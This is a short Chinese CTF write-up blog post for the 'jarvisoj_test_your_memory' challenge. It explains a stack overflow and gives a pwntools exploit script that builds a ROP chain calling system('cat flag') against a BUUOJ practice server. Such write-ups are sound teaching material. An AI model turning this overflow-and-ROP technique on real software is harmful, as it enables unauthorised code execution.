jarvisoj_test_your_memory

exp 脚本

栈溢出，有 system 函数， rodata 段有 cat flag ，那就不需要拿 shell ，直接栈溢出 rop 调用 system('cat flag') 即可

from pwn import *

io =remote('node3.buuoj.cn',25430)


system_plt = 0x8048440
cat_flag = 0x80487e0

payload = 'a' * 23 + p32(system_plt) + p32(0x8048677) + p32(cat_flag)

io.sendline(payload)

io.interactive()

posted @ 2020-02-29 20:03 PwnKi 阅读(446) 评论(0) 编辑收藏举报

刷新页面返回顶部